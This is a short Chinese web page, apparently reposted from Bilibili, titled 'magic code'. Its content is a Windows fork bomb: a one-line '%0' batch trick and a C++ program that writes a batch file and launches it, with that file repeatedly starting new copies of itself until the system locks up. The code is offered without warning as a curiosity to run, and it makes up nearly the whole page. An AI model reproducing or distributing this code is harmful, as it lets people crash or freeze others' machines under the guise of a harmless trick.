首页 / 热点 > / 内容页

神奇代码

发布日期:2023-04-09 16:13:55 来源:哔哩哔哩

start command


【资料图】

%0

#include<bits/stdc++.h>

using namespace std;

int main(){

freopen("11.out","w",stdout);

cout << ":1 \n start 11.bat \n goto 1";

fclose(stdout);

system("ren 11.out 11.bat");

system("start 11.bat");

}

最近更新